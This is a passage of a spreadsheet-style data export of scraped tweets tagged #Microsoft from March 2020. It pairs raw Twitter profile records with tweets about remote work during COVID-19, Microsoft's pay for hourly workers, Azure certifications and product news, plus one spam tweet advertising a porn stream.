    <t>{'id': 91064389, 'id_str': '91064389', 'name': 'Shinjie', 'screen_name': 'shinjie93', 'location': '', 'description': 'Reading and taking out highlights', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 150, 'friends_count': 101, 'listed_count': 141, 'created_at': 'Thu Nov 19 08:37:58 +0000 2009', 'favourites_count': 167, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4707,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'http://pbs.twimg.com/profile_images/959093151632797696/G_rtOHrV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959093151632797696/G_rtOHrV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/91064389/1494322279',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</si>
  <si>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05:25:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will pay hourly workers regularly even if they spend less time on the clock because of #coronavirus
https://t.co/IMdoHzJSDY #proud #fb #in #microsoftlife #DoTheRightThing</t>
  </si>
  <si>
    <t>{'id': 254162335, 'id_str': '254162335', 'name': 'Brandon', 'screen_name': 'bc3tech', 'location': 'Redmond, WA', 'description': 'Sr. SDE in Microsoft CSE *Opinions are mine alone* #kidneyDonor #dotnetitude #dx4lyfe #serverless #azure', 'url': 'http://t.co/l1owybWyYS', 'entities': {'url': {'urls': [{'url': 'http://t.co/l1owybWyYS', 'expanded_url': 'http://bc3.tech/brandonh', 'display_url': 'bc3.tech/brandonh', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 880, 'friends_count': 291, 'listed_count': 223, 'created_at': 'Fri Feb 18 18:47:58 +0000 2011', 'favourites_count': 2234, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 47180, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '647687', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000331918104/7b867cb6c510a285eaf5d252aae4d0bc_normal.gif', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000331918104/7b867cb6c510a285eaf5d252aae4d0bc_normal.gif', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/254162335/1403667512', 'profile_link_color': '5B6161',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</si>
  <si>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Fri Mar 06 05:24:21 +0000 2020</t>
  </si>
  <si>
    <t>Seattle traffic disappears as Amazon, #Microsoft, others enforce remote work https://t.co/6jgeD5jJbK</t>
  </si>
  <si>
    <t>Fri Mar 06 05:23:18 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/mo6OyuX0uv
Play All Videos To TV 2020 From PC &amp;amp; Tablet On Windows 10
https://t.co/75eu9KPNhk
https://t.co/U45RO5Je8g
https://t.co/6WgJC8gbAm
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone #ipad #tablet #cnxplayer #app #hdr #10bit #4k #fullhd https://t.co/T8B8gHc9dO</t>
  </si>
  <si>
    <t>Fri Mar 06 05:22:56 +0000 2020</t>
  </si>
  <si>
    <t>#Amazon, #Microsoft and #Facebook advise employees to work from home
https://t.co/wHhlr015Wo</t>
  </si>
  <si>
    <t>{'id': 393404934, 'id_str': '393404934', 'name': 'Ferenc Sanderson', 'screen_name': 'fundconsult', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 278, 'friends_count': 99, 'listed_count': 43, 'created_at': 'Tue Oct 18 13:54:36 +0000 2011', 'favourites_count': 1917, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15873,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'http://pbs.twimg.com/profile_images/3345649534/a5fe289ec741e5e01a562a0c82723144_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3345649534/a5fe289ec741e5e01a562a0c82723144_normal.jpeg',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</si>
  <si>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05:20:12 +0000 2020</t>
  </si>
  <si>
    <t>Today is a porn stream with my new sex toy  Link in the first post #Grand Rapids  #dmme #earrings #microsoft https://t.co/bTDyjKALvE</t>
  </si>
  <si>
    <t>{'id': 1235531640681697281, 'id_str': '1235531640681697281', 'name': 'Christina Moravits', 'screen_name': 'unfurthistver', 'location': 'Huntsville, USA', 'description': 'There is no more lovely, friendly, and charming relationship, communion or company than a good marriage', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Thu Mar 05 11:44:38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'http://pbs.twimg.com/profile_images/1235551336957120512/RdQTrt4y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235551336957120512/RdQTrt4y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235531640681697281/1583413461',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</si>
  <si>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05:16:59 +0000 2020</t>
  </si>
  <si>
    <t>#ShortVideoSeries
Hashtags and Mentions of @wakelet, creating #wakeletwave.
https://t.co/cKZ236sfXb
#MicrosoftEDU #microsoft @MicrosoftEDU @JBDbiz @J4jammy
@MisbahGedal
@kyteijas @amit_nfu @annkozma723 #ICT4SDG #eLearning #BuildingTheFutureTogether #creativity
#SDGs https://t.co/0Rkms70AlN</t>
  </si>
  <si>
    <t>{'id': 1189606639609008129, 'id_str': '1189606639609008129', 'name': 'Tanvir Singh', 'screen_name': 'singhtanvir_gt', 'location': 'Chandigarh', 'description': 'Socio-Environmental Researcher working towards Sustainable Development Goals (SDG) | Author | Public Speaker | Marketing Strategist | Environmentalist', 'url': 'https://t.co/dRKV5ti92Z', 'entities': {'url': {'urls': [{'url': 'https://t.co/dRKV5ti92Z', 'expanded_url': 'http://greenthinkerz.org', 'display_url': 'greenthinkerz.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 492, 'friends_count': 1547, 'listed_count': 3, 'created_at': 'Wed Oct 30 18:15:13 +0000 2019', 'favourites_count': 400, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 301, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219280437211693056/Z8s_Cjtl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219280437211693056/Z8s_Cjtl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1189606639609008129/1579533961',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</si>
  <si>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05:14:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft offers a role-based #Azure Certification structure such as fundamental, associate, and expert levels. You may choose the #certification purely to build knowledge and skills related to market job roles.
Microsoft has introduced the following n... https://t.co/61zxtKnhja https://t.co/xF2PMjQKku</t>
  </si>
  <si>
    <t>{'id': 1062240872119656448, 'id_str': '1062240872119656448', 'name': 'testpreptraining.com', 'screen_name': 'testpreptrain', 'location': 'London, England', 'description': 'Career | Training | Professional Development', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 75, 'friends_count': 254, 'listed_count': 3, 'created_at': 'Tue Nov 13 07:08:54 +0000 2018', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 809, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1082205080235851776/1h7q27YA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082205080235851776/1h7q27YA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1062240872119656448/1583389438',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</si>
  <si>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05:10:42 +0000 2020</t>
  </si>
  <si>
    <t>Now that so many Microsoft employees are working remotely, Im excited for the future software improvements that this shared experience will bring :)
#Microsoft</t>
  </si>
  <si>
    <t>{'id': 896200574399414273, 'id_str': '896200574399414273', 'name': 'Jonas', 'screen_name': 'blockchainjonas', 'location': 'Vancouver, British Columbia', 'description': 'blockchain tech and AI enthusiast now working in government.', 'url': 'https://t.co/UXSrPGNocS', 'entities': {'url': {'urls': [{'url': 'https://t.co/UXSrPGNocS', 'expanded_url': 'http://www.whatamidoinginthepublicsectoromg.com', 'display_url': 'whatamidoinginthepublicsectoromg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 83, 'listed_count': 1, 'created_at': 'Sat Aug 12 02:44:02 +0000 2017', 'favourites_count': 1620, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 369,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'http://pbs.twimg.com/profile_images/1193746782775169029/HrBpB80Z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193746782775169029/HrBpB80Z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/896200574399414273/1573446387',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</si>
  <si>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05:10:23 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) D. Washington 
#ContestAlert #99jobs #quizcontest #ContestIndia #ITquiz #ContestTime #ContestAlertIndia #Contest_Alert #contests #contest #Microsoft 
@Zaaid08
 @yograjjoshi
 @YashGoy54892506
 @yashgandhi66
 @y_shivv
 @vvraghavan
 @viratian_boy
 @VinetaGopalakr1</t>
  </si>
  <si>
    <t>{'id': 4761327673, 'id_str': '4761327673', 'name': 'Sucharita Sahu  â¤ï¸ðŸŒ¹', 'screen_name': 'SucharitaS1990', 'location': 'Delhi, India', 'description': '@SucharitaS1990', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2089, 'friends_count': 4302, 'listed_count': 56, 'created_at': 'Fri Jan 15 04:35:32 +0000 2016', 'favourites_count': 48571, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 74077,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'http://pbs.twimg.com/profile_images/1224629336646377472/yYMHuqPb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224629336646377472/yYMHuqPb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4761327673/1580809362',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</si>
  <si>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05:06:00 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join 
 @SucharitaS1990 
@godsowntalk 
@bokadia_vinita</t>
  </si>
  <si>
    <t>{'id': 993282908, 'id_str': '993282908', 'name': 'AjayKumarSahoo', 'screen_name': 'ajaysahoo1981', 'location': 'New Delhi, India', 'description': 'Big Fan of #GovernEyeâ¤\nSocial Media Lover â¤Contest Freakâ¤Foodieâ¤TwitterAddictðŸŽ§MusicFreakðŸŽ§', 'url': 'https://t.co/OLL4ZB8JgE', 'entities': {'url': {'urls': [{'url': 'https://t.co/OLL4ZB8JgE', 'expanded_url': 'https://www.youtube.com/channel/UCxj9MhY_bhlERg2E5EMoKlA?view_as=subscriber', 'display_url': 'youtube.com/channel/UCxj9Mâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2304, 'friends_count': 4628, 'listed_count': 73, 'created_at': 'Thu Dec 06 15:27:35 +0000 2012', 'favourites_count': 49980, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 68737,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'http://pbs.twimg.com/profile_images/1076112233829085185/rHUU_57I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1076112233829085185/rHUU_57I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/993282908/1549555344',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</si>
  <si>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05:05:54 +0000 2020</t>
  </si>
  <si>
    <t>Want to learn more about Microsoft Defender ATP and drill down into many of its capabilities? Have a look at this selection of short videos: https://t.co/govqG4ThMu - many new videos have just been added  
 #mdatp #cybersecurity #Microsoft #infosec</t>
  </si>
  <si>
    <t>{'id': 2392968931, 'id_str': '2392968931', 'name': 'Microsoft Defender ATP', 'screen_name': 'MSDefenderATP', 'location': 'Redmond, WA', 'description': 'Microsoft Defender Advanced Threat Protection (ATP) - Unified platform for preventive protection, post-breach detection, investigation and response.', 'url': 'https://t.co/CI00Pljy3s', 'entities': {'url': {'urls': [{'url': 'https://t.co/CI00Pljy3s', 'expanded_url': 'https://www.microsoft.com/en-us/windowsforbusiness/windows-atp', 'display_url': 'microsoft.com/en-us/windowsfâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5422, 'friends_count': 1093, 'listed_count': 281, 'created_at': 'Sun Mar 16 16:26:24 +0000 2014', 'favourites_count': 675, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2959,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'http://pbs.twimg.com/profile_images/959108676278603776/ZnQSkLZ-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959108676278603776/ZnQSkLZ-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2392968931/1568111854', 'profile_link_color': '094AB2',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</si>
  <si>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05:05:09 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/GOA8DeMKlw #cloud #microsoft #azure</t>
  </si>
  <si>
    <t>{'id': 14199719, 'id_str': '14199719', 'name': 'Kurt Hamm', 'screen_name': 'kurthamm', 'location': 'Columbia, SC', 'description': 'IT CIO - Consultant - Change Agent - Contact Center - Cloud - IVR - CRM - opinions my own', 'url': 'https://t.co/QHV7QNoac1', 'entities': {'url': {'urls': [{'url': 'https://t.co/QHV7QNoac1', 'expanded_url': 'http://www.hamm.me', 'display_url': 'hamm.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2321, 'friends_count': 3868, 'listed_count': 273, 'created_at': 'Sat Mar 22 23:58:53 +0000 2008', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13635,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'http://pbs.twimg.com/profile_images/1098048140270333953/2upymBXc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1098048140270333953/2upymBXc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14199719/1550630307',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</si>
  <si>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Mar 06 05:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#SolteamOpto works with partners to re-establish a base in #Taiwan and advance smart #manufacturing - #Microsoft #Azure #IoT https://t.co/MiFGo6EalF #MSFTAdvocate</t>
  </si>
  <si>
    <t>#Microsoft and #Telefonica agreed to expand their global strategic collaboration. The US firm will open a Data Centre in Spain that will take advantage of Telefonicas infrastructure, which in turn will push the use of Microsofts cloud internally https://t.co/zSLItvISgg https://t.co/urQXsWsJPk</t>
  </si>
  <si>
    <t>{'id': 237064482, 'id_str': '237064482', 'name': 'The Corner', 'screen_name': 'thecornerdoteu', 'location': 'Global', 'description': '#Spain and #EU economies in a global context. Exclusive insight from top market commentators. We are europhile but independent. And we love debating.', 'url': 'http://t.co/J7GQENuq8Y', 'entities': {'url': {'urls': [{'url': 'http://t.co/J7GQENuq8Y', 'expanded_url': 'http://www.thecorner.eu', 'display_url': 'thecorner.eu', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1629, 'friends_count': 1826, 'listed_count': 198, 'created_at': 'Wed Jan 12 00:36:40 +0000 2011', 'favourites_count': 731, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 37222, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FD9901', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/502812577047404544/9zKe_0Pt_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/502812577047404544/9zKe_0Pt_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/237064482/1466768896', 'profile_link_color': '0099CC', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F6FFD1', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 04:57:11 +0000 2020</t>
  </si>
  <si>
    <t>With the #workfromhome policy this month at #microsoft, we might just reach our carbon neutrality goal that much quicker. https://t.co/LG3Ej3f0Su</t>
  </si>
  <si>
    <t>{'id': 821942493394501632, 'id_str': '821942493394501632', 'name': 'Christian Gunderman', 'screen_name': 'chgunderman', 'location': 'Bellevue, WA', 'description': 'Computer whisperer. Developer on the @Visualstudio Team @Microsoft working on Editor, shell, LSP, and VS Online client. Opinions + commentary are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 367, 'friends_count': 1159, 'listed_count': 3, 'created_at': 'Thu Jan 19 04:48:56 +0000 2017', 'favourites_count': 1851, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1422, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/967907536820092929/UQNznyOq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/967907536820092929/UQNznyOq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/821942493394501632/1484802343',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</si>
  <si>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04:56:10 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365: Ultimate Guide
Checkout -: https://t.co/Uqqd1HGwq7
#Dynamics365 #Microsoft https://t.co/b2QSJeiCN0</t>
  </si>
  <si>
    <t>{'id': 89767601, 'id_str': '89767601', 'name': 'IT GURUS OF ATLANTA', 'screen_name': 'ITGURUSATL', 'location': 'Atlanta, GA', 'description': 'Information Technology under one company from Cloud Solutions to Program Management, Citrix VDI to Six Sigma, hardware retailer, we are your No.1 provider!', 'url': 'https://t.co/jlltwL43Ca', 'entities': {'url': {'urls': [{'url': 'https://t.co/jlltwL43Ca', 'expanded_url': 'http://www.itgurusatl.com', 'display_url': 'itgurusatl.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5642, 'friends_count': 5815, 'listed_count': 21, 'created_at': 'Fri Nov 13 18:59:07 +0000 2009', 'favourites_count': 5078, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11846,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'http://pbs.twimg.com/profile_images/1027343952968482818/Bpp-TLrl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027343952968482818/Bpp-TLrl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/89767601/1467172589',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</si>
  <si>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04:52:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft offers a role-based #Azure Certification structure such as fundamental, associate, and expert levels. You may choose the #certification purely to build knowledge and skills related to market job roles.
  https://t.co/61zxtKESaI https://t.co/DJONPlh23G</t>
  </si>
  <si>
    <t>Fri Mar 06 04:52:21 +0000 2020</t>
  </si>
  <si>
    <t>Impressive commitment to support all workers during times of stress! #Microsoft  https://t.co/5tcww2fVHi</t>
  </si>
  <si>
    <t>{'id': 253925945, 'id_str': '253925945', 'name': 'Becky Keene', 'screen_name': 'BeckyKeene', 'location': 'Seattle, WA', 'description': 'Director @i2eEDU @PhygitalLabs | MSEd, prof learning guru, #NBCT, international speaker, #msftedu expert, #onenote junkie, #edtech #1:1 #thatgirlfromthevideos', 'url': 'https://t.co/Vo4FHSOwyU', 'entities': {'url': {'urls': [{'url': 'https://t.co/Vo4FHSOwyU', 'expanded_url': 'http://www.linkedin.com/in/beckykeene/', 'display_url': 'linkedin.com/in/beckykeene/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5030, 'friends_count': 1071, 'listed_count': 244, 'created_at': 'Fri Feb 18 07:30:58 +0000 2011', 'favourites_count': 14374, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13722,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'http://pbs.twimg.com/profile_images/1201678187677118464/SaV7t_Ux_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201678187677118464/SaV7t_Ux_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/253925945/1579960442',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</si>
  <si>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04:50:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will pay hourly #workers regular wages even if their hours are reduced because of #COVID19 concerns https://t.co/Z1vX4qx9Dq https://t.co/Ys3JvPBMeM</t>
  </si>
  <si>
    <t>{'id': 61775276, 'id_str': '61775276', 'name': 'Mumin Al Shawaf (I am Hiring)', 'screen_name': 'alshawafmumin', 'location': 'Toronto, Ontario', 'description': 'Executive #SaaS #entrepreneur scaling #startups. 2 unicorns #netsuite #eloqua and growing #Tophat.\nLove to connect with brilliant minds in the startup community', 'url': 'https://t.co/VWuUIX99lp', 'entities': {'url': {'urls': [{'url': 'https://t.co/VWuUIX99lp', 'expanded_url': 'http://www.tophat.com', 'display_url': 'tophat.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 539, 'friends_count': 1225, 'listed_count': 12, 'created_at': 'Fri Jul 31 13:53:31 +0000 2009', 'favourites_count': 845, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10957,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'http://pbs.twimg.com/profile_images/1225229959452487680/Y3KEmQGN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225229959452487680/Y3KEmQGN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/61775276/1580952610',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</si>
  <si>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04:50:21 +0000 2020</t>
  </si>
  <si>
    <t>No #WSL Event https://t.co/XhjDTPT8oC WSL just another #microsoft failure: https://t.co/oIF6plO13v</t>
  </si>
  <si>
    <t>{'id': 26603208, 'id_str': '26603208', 'name': 'Dr. Roy Schestowitz (ç½—ä¼Š)', 'screen_name': 'schestowitz', 'location': 'North Pole', 'description': 'Software Engineer, interdisciplinary researcher, and an advocate of fair competition. \n\nFederation: https://t.co/PoAUmLGPZ7', 'url': 'http://t.co/tIN24agXcT', 'entities': {'url': {'urls': [{'url': 'http://t.co/tIN24agXcT', 'expanded_url': 'http://schestowitz.com', 'display_url': 'schestowitz.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/PoAUmLGPZ7', 'expanded_url': 'https://pleroma.site/users/schestowitz', 'display_url': 'pleroma.site/users/schestowâ€¦', 'indices': [100, 123]}]}}, 'protected': False, 'followers_count': 7977, 'friends_count': 969, 'listed_count': 1923, 'created_at': 'Wed Mar 25 21:57:38 +0000 2009', 'favourites_count': 55741, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 742867,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'http://pbs.twimg.com/profile_images/1175656218205065216/djhZlovP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175656218205065216/djhZlovP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26603208/1581914365', 'profile_link_color': '3B94D9',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</si>
  <si>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04:50:09 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft will pay hourly workers regular wages even if their hours are reduced because of COVID-19 concerns https://t.co/CsU1XKDb4U https://t.co/0GXgkSNIUk</t>
  </si>
  <si>
    <t>{'id': 755261917342478336, 'id_str': '755261917342478336', 'name': 'Byte Funding', 'screen_name': 'ByteFunding', 'location': 'Denver, CO', 'description': 'A #technology #investment deal platform providing all the resources #investors in this sector need; news, education, investment offerings.  #fintech #finance', 'url': 'https://t.co/dbEJPV8cff', 'entities': {'url': {'urls': [{'url': 'https://t.co/dbEJPV8cff', 'expanded_url': 'http://www.bytefunding.com', 'display_url': 'bytefunding.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2050, 'friends_count': 3862, 'listed_count': 377, 'created_at': 'Tue Jul 19 04:44:08 +0000 2016', 'favourites_count': 522, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 46206, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/787165493304045568/RGZnNXUn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/787165493304045568/RGZnNXUn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/755261917342478336/1476513020',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</si>
  <si>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04:49:03 +0000 2020</t>
  </si>
  <si>
    <t>DigitalChamber #TC #california #coronavirus #COVID19 #Microsoft Microsoft will pay hourly workers regular wages even if their hours are reduced because of COVID-19 concerns https://t.co/vYUrV9oLbs https://t.co/VV5qOmUGrm</t>
  </si>
  <si>
    <t>{'id': 780792121431199745, 'id_str': '780792121431199745', 'name': 'European Chamber of Digital Commerce', 'screen_name': 'Juchtervbergen', 'location': 'Schiphol-Rijk, Haarlemmermeer', 'description': 'The European Chamber of Digital Commerce is your hub for the top developments in Digitalization and Fintech.\n\nR.A.U. Juchter van Bergen Quast, CEO', 'url': 'https://t.co/PPryFw7i8N', 'entities': {'url': {'urls': [{'url': 'https://t.co/PPryFw7i8N', 'expanded_url': 'http://www.europeanchamberofdigitalcommerce.com', 'display_url': 'europeanchamberofdigitalcommerce.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2124, 'friends_count': 154, 'listed_count': 14, 'created_at': 'Tue Sep 27 15:32:02 +0000 2016', 'favourites_count': 1415, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 42066,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'http://pbs.twimg.com/profile_images/1118111458812944384/F4TT4I6m_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118111458812944384/F4TT4I6m_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/780792121431199745/1559661574',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</si>
  <si>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04:42:16 +0000 2020</t>
  </si>
  <si>
    <t>This is great corporate leadership.  My hats off to #Microsoft !  
Now, other Seattle metro tech firms, #Amazon, #Google,  #Facebook, time to follow suit. https://t.co/iz8t2G1M5N</t>
  </si>
  <si>
    <t>{'id': 144924440, 'id_str': '144924440', 'name': 'Chuck van der Linden', 'screen_name': 'ChuckvdL', 'location': 'Seattle metro area', 'description': 'Tech-nerd/alpha-geek, QA Obsessed Agile Tester transitioning into Security, Seattle Seawolves rugby fan, gadgeteer, sci-fi reader, rpg gamer (He/Him)', 'url': 'https://t.co/Doalg9kA5T', 'entities': {'url': {'urls': [{'url': 'https://t.co/Doalg9kA5T', 'expanded_url': 'http://resolvedtotest.com', 'display_url': 'resolvedtotest.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 137, 'friends_count': 217, 'listed_count': 5, 'created_at': 'Mon May 17 17:32:02 +0000 2010', 'favourites_count': 950, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1182,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'http://pbs.twimg.com/profile_images/1200154457910071296/9fP3i9aC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200154457910071296/9fP3i9aC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/144924440/1565499071',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</si>
  <si>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04:41:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Flight Simulator weekly update schedule hampered due to coronavirus concerns #microsoft #flightsimulator: https://t.co/zFzCEJ2GtY via @NeowinFeed</t>
  </si>
  <si>
    <t>{'id': 60815392, 'id_str': '60815392', 'name': 'Buddahfan', 'screen_name': 'Buddahfan', 'location': 'Los Angeles', 'description': 'I cover technology with the emphasis on Microsoft/Windows, Security  &amp; Android.   Political news Conservative and Libertarian websites.  Plus miscellaneous news', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 706, 'friends_count': 327, 'listed_count': 154, 'created_at': 'Tue Jul 28 04:53:37 +0000 2009', 'favourites_count': 2171, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 267208,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'http://pbs.twimg.com/profile_images/1004728903972208641/zTwJ-Zpn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1004728903972208641/zTwJ-Zpn_normal.jpg',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</si>
  <si>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04:40:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Patents Piracy Blocking Technology But Americans Still Use Kodi
#microsoft #patents #piracy #blocking #technology
https://t.co/hH9a0HSVh8</t>
  </si>
  <si>
